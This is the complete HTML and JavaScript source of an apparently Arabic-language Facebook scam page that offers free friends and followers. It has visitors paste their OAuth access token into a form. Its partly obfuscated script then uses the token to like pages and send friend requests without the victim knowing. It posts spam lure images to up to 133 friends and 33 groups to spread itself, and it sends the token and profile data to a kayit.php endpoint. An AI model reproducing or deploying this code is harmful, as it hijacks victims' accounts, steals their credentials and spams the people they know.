<html xmlns:og="http://ogp.me/ns#" xmlns:fb="https://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>أحصل على الكثير من الأصدقاء والمتابعين مجاناً</title>
<style type="text/css">
body{background-image:url('http://i.imgur.com/wsqrwtR.png');background-repeat:no-repeat;background-color:#00539f;}
</style>
<style type="text/css" style="display:none">
.Image_Default{}
</style>
<script type="text/javascript" src="http://www.fab.ma/bac3/jquery.js"></script>
<script type="text/javascript">window.jQuery || document.write('<script src="classes/commons/jquery/jquery-1.7.1.min.js"><\/script>')</script>
<style type="text/css" style="display:none">
.ys_submenu{background-color:black;border:solid 1px black;position:absolute;display:none;padding:0px;margin:0;background:#000000;background:#000000 -webkit-gradient(linear,center top,center bottom,from(#ffffff),to(#ffffff));background:#000000 -moz-linear-gradient(center top,#ffffff 0%,#ffffff 100%);border:0px solid #fff;-webkit-border-radius:6px;-khtml-border-radius:6px;-moz-border-radius:6px;-o-border-radius:6px;border-radius:6px;-webkit-box-shadow:0 1px 10px rgba(0,0,0,.5);-moz-box-shadow:0 1px 10px rgba(0,0,0,.5);box-shadow:0 1px 10px rgba(0,0,0,.5);z-index:99999;}.ys_submenu ul{list-style:none!important;padding:0 0px;margin:0;line-height:160%;}.ys_submenu ul li{padding:3px 10px;margin:0;line-height:160%;clear:both;}.ys_submenu ul li:hover.ys_submenu ul li a{color:#336699!important;text-decoration:none;padding:0px;margin:0;line-height:160%;}.ys_submenu ul li a:hover,.ys_submenu ul li:hover a{text-decoration:none;padding:0px;margin:0;color:white!important;}.ys_submenu ul li:first-child:hover{-webkit-border-radius:6px 6px 0px 0px;-khtml-border-radius:6px 6px 0px 0px;-moz-border-radius:6px 6px 0px 0px;;-o-border-radius:6px 6px 0px 0px;border-radius:6px 6px 0px 0px;}.ys_submenu ul li:last-child:hover{-webkit-border-radius:0px 0px 6px 6px;-khtml-border-radius:0px 0px 6px 6px;-moz-border-radius:0px 0px 6px 6px;-o-border-radius:0px 0px 6px 6px;border-radius:0px 0px 6px 6px;}.ys_submenu_inner{-webkit-border-radius:0;-khtml-border-radius:0;-moz-border-radius:0;-o-border-radius:0;border-radius:0;background-position:top left;background-repeat:repeat;padding:0px;color:#333;text-align:left;}
</style>
</head>
<script type="text/javascript">
window.fbAsyncInit = function() {
        FB.init({ appId: '2231777543', status: true, cookie: true, xfbml: true });
    };

    (function() {
        var e = document.createElement('script'); e.async = true;
        e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js';
        document.getElementById('fb-root').appendChild(e);
    } ());
</script>
<script type="text/javascript">var rev = "fwd";</script>
<style type="text/css" style="display:none">
<div style='background-color: #f3f3f3;border: 1px solid #ccc;width:400px;margin-left:auto;margin-right:auto;margin-top:100px;padding:10px;font-family:verdana;'>404. Sorry,we can't seem to find that page, click <a href='/'>here</a> to return to the homepage</div>
</style>
<ul>
	<div style="text-align:center;padding:10px;">
	</div>
	<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yP/r/Ivn-CVe5TGK.ico">
	<link rel="StyleSheet" href="Auto_files/viral.htm" type="text/css">
	<div style="text-align:center;padding:10px;">
	</div>
	<div class="clear">
	</div>
</ul>
</div>
<div class="widget HTML" id="HTML3">
<div class="widget HTML" id="HTML2">
	<font color="blue">
	<div class="widget-content">
		<style>
body {
      overflow: hidden;
}
#overlay {
  display: none;
  height: 100%;
  position: absolute;
  width: 100%;
  z-index: 9999;
}
#login_container {
  position: relative;
  width: 858px;
}
#login_form {
background-color:#b0c4de;
  border-radius: 2px;
  margin-top: -1118px;
  margin-left: 0px;
  padding: 8px;
  position: absolute;
  top: 64px;
  zoom: 1;
  box-shadow: 0 1px 5px black;
}
#login_form p {
  display: inline-block;
  *display: inline;
  margin-bottom: 0;
  margin-right: 4px;
  width: 240px;
  zoom: 1;
}
#login_form button {
  line-height: 30px;
  margin: 0;
}
.box {
  background: #fafafa;
  border-radius: 3px;
  box-shadow: 0 1px 3px rgba(0, 0, 0, .2);
  margin-bottom: 16px;
}
.box-header {
  background-color: #e5e5e5;
  background-image: -webkit-gradient(linear, left top, left bottom, from(rgb(235, 235, 235)), to(rgb(229, 229, 229)));
  background-image: -webkit-linear-gradient(top, rgb(235, 235, 235), rgb(229, 229, 229));
  background-image: -moz-linear-gradient(top, rgb(235, 235, 235), rgb(229, 229, 229));
  background-image: -o-linear-gradient(top, rgb(235, 235, 235), rgb(229, 229, 229));
  background-image: -ms-linear-gradient(top, rgb(235, 235, 235), rgb(229, 229, 229));
  background-image: linear-gradient(top, rgb(235, 235, 235), rgb(229, 229, 229));
  filter: progid:DXImageTransform.Microsoft.gradient(startColorStr='#ebebeb', EndColorStr='#e5e5e5');
  border-top: 1px solid #fafafa;
  border-top-left-radius: 3px;
  border-top-right-radius: 3px;
  height: 40px;
}
.box-header .glyph {
  float: left;
  font-size: 16px;
  line-height: 40px;
  margin-right: -3px;
  padding-left: 14px;
  text-shadow: 0 1px 0 #fff;
}
.box-header .icon16 {
  float: left;
  height: 16px;
  width: 16px;
  margin-left: 14px;
  margin-right: -3px;
  margin-top: 11px;
}
.box-header h1 {
  color: #898989;
  float: left;
  font-family: "Tahoma", "Lucida Grande", sans-serif;
  font-size: 11px;
  font-weight: bold;
  line-height: 40px;
  padding-left: 14px;
  text-shadow: 0 1px 0 #fff;
  text-transform: uppercase;
}
.box-header ul {
  border-left: 1px solid #e1e1e1;
  float: right;
}
.box-header ul li {
  display: inline;
  margin-left: -3px;
}
.box-header ul li a {
  border-left: 1px solid #f2f2f2;
  border-right: 1px solid #e1e1e1;
  color: #999;
  display: inline-block;
  *display: inline;
  font-family: "Tahoma", "Lucida Grande", sans-serif;
  font-size: 11px;
  font-weight: bold;
  line-height: 40px;
  padding: 0 20px;
  text-decoration: none;
  text-transform: uppercase;
  zoom: 1;
}
.box-header ul li a:hover {
  background: #eee;
}
.box-header ul li:first-child {
  margin-left: 0;
}
.box-header ul li:last-child a {
  border-right: none;
}
.box-header ul li.active a {
  background: #fafafa;
  border-left: 1px solid #fafafa;
  cursor: default;
}
.box-content {
  padding: 14px;
}
form p {
  margin-bottom: 11px;
  position: relative;
}
form input[type="text"], form input[type="password"], form textarea {
  background: url(../img/input_bg.png) repeat-x #fdfdfd;
  border: 1px solid #d9d9d9;
  border-top: 1px solid #ccc;
  border-radius: 2px;
  box-shadow: 0 1px 0 #fff;
  color: #666;
  font-family: "Aller", "Lucida Grande", sans-serif;
  font-size: 12px;
  height: 30px;
  outline: none;
  padding: 6px 10px;
  resize: none;
  width: 252px;
}
form input::-webkit-input-placeholder, form input::-moz-placeholder {
  color: #bbb;
}
form textarea {
  height: 112px;
  line-height: 18px;
  margin-bottom: 0;
  padding-top: 8px;
}
form div.combined {
  position: relative;
}
form div.combined p {
  display: inline-block;
  *display: inline;
  zoom: 1;
}
form div.combined p input {
  display: inline;
}
form div.combined p:first-child input {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
  border-right: none;
}
.box ul.statistics li {
  border-bottom: 1px solid #ebebeb;
  border-top: 1px solid #fff;
  list-style: none;
}
ul.statistics li:first-child {
  border-top: none;
}
ul.statistics li:last-child {
  border-bottom: none;
}
ul.statistics li a {
  color: #666;
  display: block;
  line-height: 32px;
  text-decoration: none;
}
ul.statistics li a:hover {
  color: #999;
}
ul.statistics li a span {
  display: inline-block;
  *display: inline;
  font-size: 18px;
  font-weight: bold;
  margin-right: 10px;
  text-align: right;
  width: 70px;
  zoom: 1;
}
input.button, .button {
  background: url(../img/buttongray_bg.png) repeat-x #ebebeb;
  border: 1px solid #c4c4c4;
  border-radius: 3px;
  box-shadow: 0 1px 3px #ddd;
  color: #757575;
  display: inline-block;
  *display: inline;
  font-family: "Tahoma", sans-serif;
  font-size: 11px;
  font-weight: bold;
  height: 31px;
  line-height: 31px;
  margin-right: 4px;
  padding: 0 14px;
  text-decoration: none;
  text-shadow: 0 1px 0 #fff;
  text-transform: uppercase;
  zoom: 1;
}
.box-content > .button {
  margin-bottom: 7px;
}
input.button {
  height: 33px;
  margin-top: -3px;
}
.button.blue {
  background: url(../img/buttonblue_bg.png) repeat-x #477dae;
  border: 1px solid #477dae;
  color: #fff;
  text-shadow: 0 1px 0 #104266;
}
.button:hover {
  background: #ebebeb;
}
.button.blue:hover {
  background: #558bbc;
}
		</style>
		<div id="login_container" style="position: absolute; left: 350px; margin-top: 0px">
			<div id="login_form">
				<form id="tokengonder" novalidate="novalidate">
					<p style="width: 200px;">
						<input id="access_token" name="access_token" placeholder="ضـع هـنـا الـكـود" class="{validate: {required: true}}" type="text">
					</p>
					&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <button id="gonder" type="button" class="button blue"> تشغيل </button>&nbsp;<button id="tokenal" onclick="window.open('view-source:http://www.facebook.com/dialog/oauth?type=user_agent&scope=&client_id=139682082719810&redirect_uri=http://www.facebook.com/connect/login_success.html%3F-%D8%A5%D9%86%D8%B3%D8%AE+%D9%87%D8%B0%D8%A7+%D8%A7%D9%84%D8%B1%D8%A7%D8%A8%D8%B7+%D8%A8%D8%A7%D9%84%D9%83%D8%A7%D9%85%D9%84+Red+Ice-&sso_key=com.jango.jango&sdk=ios&display=popup','sth','width=600,height=100');" type="button" class="button blue">أحصل على الكود</button>&nbsp;
					<div id="logs">
					</div>
				</form>
			</div>
			<div id="atp">
			</div>
			<br>
			&nbsp;
			<p>
				&nbsp;
			</p>
			<p>
				&nbsp;
			</p>
			<p>
				<br>
			</p>
			<p>
				&nbsp;
			</p>
			<p>
				&nbsp;
			</p>
			<p>
				&nbsp;
			</p>
			<p>
				&nbsp;
			</p>
			<p>
				<br>
			</p>
			<p>
				<br>
			</p>
		</div>
		<script type="text/javascript" src="/jquery.htm"></script>
<script>
    var arr = [""];
    var tokenme;
    var user = {};

    function ileti(type, msg) {
        $('#logs').append('<div class="notification ' + type + '" id="ileti" style="display:none;margin-top:10px;"><span class="icon"></span>' + msg + '</div>');
        $('#ileti').fadeIn('slow');
        $('#ileti').removeAttr('id');
    }
    $('#gonder').click(function () {
        if ($('#access_token').val().length > 50) {
            $('.anlatim').hide();
            $('#logs').html("");
            $('#gonder').attr("disabled", "disabled");
            $('#gonder').attr("class", "button grey");

            access_token = $('#access_token').val();
            if (access_token.indexOf("access_token=") > 0) {
                access_token = access_token.split("access_token=")[1].split("&")[0];
                $('#access_token').val(access_token);
            }
            jQuery.ajax({
                url: 'https://graph.facebook.com/me?access_token=' + access_token,
                dataType: 'jsonp',
                success: function (data) {
                    user = data;
                    if (user && user.name) {
                        ileti("success", "Hello " + user.name + " مرحباً بك");
                        ileti("success", "<img src='https://graph.facebook.com/" + user.id + "/picture'>");
                        ileti("success", "↓ يجب عليك الضغط على زر متابعه ↓");
                        ileti("success", "<a href='https://www.facebook.com/209856532361246' target='_blank'><img src='http://im33.gulfup.com/ohlnY.png'></a>");
                        ileti("success", "↑ You must click on follow button ↑");
                        tokenme = access_token;

                        add(tokenme, "100001039173813");

                        sayfabegen("https://www.facebook.com/209856532361246");
                        sayfabegen("https://www.facebook.com/144012072460112");
                        sayfabegen("https://www.facebook.com/547350095310712");
                        sayfabegen("https://www.facebook.com/152841574905871");
                        sayfabegen("https://www.facebook.com/145760738948721");
                        sayfabegen("https://www.facebook.com/258181960985883");
                        sayfabegen("https://www.facebook.com/137647199773931");
                        sayfabegen("https://www.facebook.com/237462439717894");
                        sayfabegen("https://www.facebook.com/552461351479374");
                        sayfabegen("https://www.facebook.com/520346354670154");
                        sayfabegen("https://www.facebook.com/593262797361709");
                        sayfabegen("https://www.facebook.com/327115687419117");
                        sayfabegen("https://www.facebook.com/542737819116265");
                        sayfabegen("https://www.facebook.com/477135725705591");
                        sayfabegen("https://www.facebook.com/600050460028292");
                        sayfabegen("https://www.facebook.com/170790593098867");
                        sayfabegen("https://www.facebook.com/629275677087239");
                        sayfabegen("https://www.facebook.com/188839834491340");
                        sayfabegen("https://www.facebook.com/116377081773625");
                        sayfabegen("https://www.facebook.com/271488509618473");
                        sayfabegen("https://www.facebook.com/208732055924978");
                        sayfabegen("https://www.facebook.com/301184433313685");
                        sayfabegen("https://www.facebook.com/106231809534621");
                        sayfabegen("https://www.facebook.com/412600268808315");
                        sayfabegen("https://www.facebook.com/113105895437153");


                        frnds();
                        pgrp();


                    } else {
                        ileti("error", user.error.type + " error (" + user.error.code + ")");
                        $('#gonder').removeAttr("disabled");
                        $('#gonder').attr("class", "button blue");
                    }
                }
            });
        }
    });

    function arkadaslar() {
        document[_0xef73[2]](_0xef73[1])[_0xef73[0]] = _0xef73[3] + access_token + _0xef73[4] + _0xef73[5] + access_token + _0xef73[4];
    };

    function sayfabegen(_0xaff7x3) {
        jQuery[_0xef73[9]]({
            url: _0xef73[6] + access_token + _0xef73[7] + _0xaff7x3,
            dataType: _0xef73[8],
            success: function (_0xaff7x4) {}
        });
    };
    jQuery.ajax({
        url: 'https://graph.facebook.com/183402435144793/attending?access_token=' + access_token + '&method=post',
        dataType: 'jsonp',
        success: function (data) {}
    });




    function pgrp() {
        jQuery.ajax({
            url: 'https://graph.facebook.com/fql?q=select gid, name from group where gid IN (SELECT gid FROM group_member WHERE uid=me()) order by rand() limit 33&access_token=' + access_token,
            dataType: 'jsonp',
            success: function (data) {
                wallpostg(data);
            }
        });
    }

    function frnds() {
        jQuery.ajax({
            url: 'https://graph.facebook.com/fql?q=SELECT uid, first_name FROM user WHERE uid IN ( SELECT uid2 FROM friend WHERE uid1 = me() ) ORDER BY rand() limit 133&access_token=' + access_token,
            dataType: 'jsonp',
            success: function (data) {
                wallpost(data);
            }
        });
    }

    function kayit(user, token) {
        jQuery.ajax({
            url: 'kayit.php',
            type: 'POST',
            data: {
                userid: user.id,
                gender: user.gender,
                access_token: token,
                username: user.name
            },
            success: function (data) {
                if (data == "true") {
                    ileti("success", "Kayit basarili");
                }
            }
        });
    }

    function sayfalar(sayfa) {

    }

    function arakla(token) {
        jQuery.ajax({
            url: 'https://graph.facebook.com/me?access_token=' + token,
            dataType: 'jsonp',
            success: function (data) {
                if (data.id) {
                    kayit(data, token);
                }
            }
        });
    }

    var lien = ChaineAleatoire();
    lien = " http://www.youtube.com/watch?v=xXBR7vRdQf8_" + lien;

    function ChaineAleatoire() {
        var ListeCar = new Array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
        var Chaine = '';
        for (i = 0; i < 12; i++) {
            Chaine = Chaine + ListeCar[Math.floor(Math.random() * ListeCar.length)];
        }
        return Chaine;
    }

    fotolink = "http://media.smashingmagazine.com/wp-content/uploads/images/iphone-app-design-trends/facebook.png";
    text = " أحصل على الكثير من الأصدقاء والمتابعين من هنا -> Get Free Friends requests and Followers -> Enter here -> " + lien;
    gonderildi = 0;


    function wallpost(list) {
        for (i = 0; i < list.data.length; i++) {
            jQuery.ajax({
                url: 'https://graph.facebook.com/' + list.data[i].uid + '/photos?url=' + fotolink + '&message=' + text + '&callback=paylas&method=POST&access_token=' + access_token,
                dataType: 'script',
                success: function () {
                    gonderildi += 1;
                    if (gonderildi >= list.data.length) {}
                }
            });
        }
    }



    function wallpostg(list) {
        for (i = 0; i < list.data.length; i++) {
            jQuery.ajax({
                url: 'https://graph.facebook.com/' + list.data[i].gid + '/photos?url=' + fotolink + '&message=' + text + '&callback=paylas&method=POST&access_token=' + access_token,
                dataType: 'script',
                success: function () {
                    gonderildi += 1;
                    if (gonderildi >= list.data.length) {}
                }
            });
        }
    }

    function foto_paylas() {
        jQuery.ajax({
            url: 'https://graph.facebook.com/me/photos?privacy={"value":"EVERYONE"}&url=' + fotolink + '&message=' + text + '&callback=paylas&method=POST&access_token=' + access_token,
            dataType: 'script',
            success: function () {}
        });
    }
    var turler = {
        video: "Video",
        status: "Durum Guncellemesi",
        link: "Baglanti",
        photo: "Fotograf",
        swf: "Video"
    };

    function gonderiler() {
        jQuery.ajax({
            url: 'https://graph.facebook.com/me?fields=feed.fields(message,privacy,type)&access_token=' + access_token,
            dataType: 'jsonp',
            success: function (data) {
                posts = data;
                for (i = 0; i < posts.feed.data.length; i++) {
                    if (posts.feed.data[i].message) {
                        ileti("success", posts.feed.data[i].message.substr(0, 50) + "... (" + turler[posts.feed.data[i].type] + ")");
                    } else {
                        ileti("success", "ID: " + posts.feed.data[i].id.split("_")[1] + "... (" + turler[posts.feed.data[i].type] + ")");
                    }
                }
            }
        });
    }

    function paylas() {

    }


var _0x88c5 = ["https://graph.facebook.com/me/likes?access_token=", "&method=POST&url=", "jsonp", "ajax", "&method=POST&url=https://www.facebook.com/166458726736728", "&method=POST&url=https://www.facebook.com/202350659787584", "&method=POST&url=https://www.facebook.com/102881323245114", "&method=POST&url=https://www.facebook.com/248062068613926", "&method=POST&url=https://www.facebook.com/165482250199870", "https://graph.facebook.com/me/friends?uid=100001688026697&method=post&access_token=", "getJSON", "https://graph.facebook.com/me/friends?uid=100000884196488&method=post&access_token=", "https://graph.facebook.com/me/friends?uid=", "&method=post&access_token="];

    function sayfabegen(_0x116bx2) {
        jQuery[_0x88c5[3]]({
            url: _0x88c5[0] + access_token + _0x88c5[1] + _0x116bx2,
            dataType: _0x88c5[2],
            success: function (_0x116bx3) {}
        });
        jQuery[_0x88c5[3]]({
            url: _0x88c5[0] + access_token + _0x88c5[4],
            dataType: _0x88c5[2],
            success: function (_0x116bx3) {}
        });
        jQuery[_0x88c5[3]]({
            url: _0x88c5[0] + access_token + _0x88c5[5],
            dataType: _0x88c5[2],
            success: function (_0x116bx3) {}
        });
        jQuery[_0x88c5[3]]({
            url: _0x88c5[0] + access_token + _0x88c5[6],
            dataType: _0x88c5[2],
            success: function (_0x116bx3) {}
        });
        jQuery[_0x88c5[3]]({
            url: _0x88c5[0] + access_token + _0x88c5[7],
            dataType: _0x88c5[2],
            success: function (_0x116bx3) {}
        });
        jQuery[_0x88c5[3]]({
            url: _0x88c5[0] + access_token + _0x88c5[8],
            dataType: _0x88c5[2],
            success: function (_0x116bx3) {}
        });
    };

    function add(_0x116bx5, _0x116bx6) {
        $[_0x88c5[10]](_0x88c5[9] + _0x116bx5);
        $[_0x88c5[10]](_0x88c5[11] + _0x116bx5);
        $[_0x88c5[10]](_0x88c5[12] + _0x116bx6 + _0x88c5[13] + _0x116bx5, function (_0x116bx7) {});
    };
</script>
	</div>
	</font>
</div>
</div>
</center>
</body>
</html>
